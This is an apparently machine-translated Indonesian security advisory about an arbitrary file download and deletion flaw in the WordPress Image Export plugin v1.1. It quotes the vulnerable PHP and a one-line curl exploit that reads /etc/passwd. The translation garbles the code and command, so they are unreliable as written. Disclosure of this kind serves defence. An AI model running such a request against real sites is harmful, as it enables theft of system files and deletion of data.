Gambar WordPress Ekspor 1.1 Sewenang File Download
Oleh
chmood
Judul: Remote download file kerentanan di Plugin WordPress gambar-ekspor v1.1
Penulis: Larry W. Cashdollar, @ _larry0
Tanggal: 2015/07/01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Diberitahu: 2015/07/05
Kontak Vendor: https://twitter.com/1eftHander
Keterangan: Plugin Ekspor Gambar dapat membantu Anda selektif men-download gambar yang diunggah oleh administrator.
Kerentanan:
Kode dalam file download.php tidak melakukan pengecekan bahwa pengguna meminta file dari direktori hanya gambar yang diupload. Dan garis 8 upaya untuk
tautan file setelah download. Script ini dapat digunakan untuk menghapus file dari direktori wordpress jika hak akses file memungkinkan.
1 <? Php
2 if (isset ($ _REQUEST ['file']) &&! Kosong ($ _REQUEST ['file'])) {
3 $ file = $ _GET ['file'];
4
5 header ('Content-Type: application / zip');
6 header ('Content-Disposition: attachment; filename = "" $ file..' "');
7 readfile ($ file);
8 unlink ($ file);
9
10 exit;
11}
12?>
CVEID: TBD
Exploit Code:
β’ $ keriting http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Layar Shots:
Penasehat: http://www.vapid.dhs.org/advisory.php?v=135
Category
Komentar
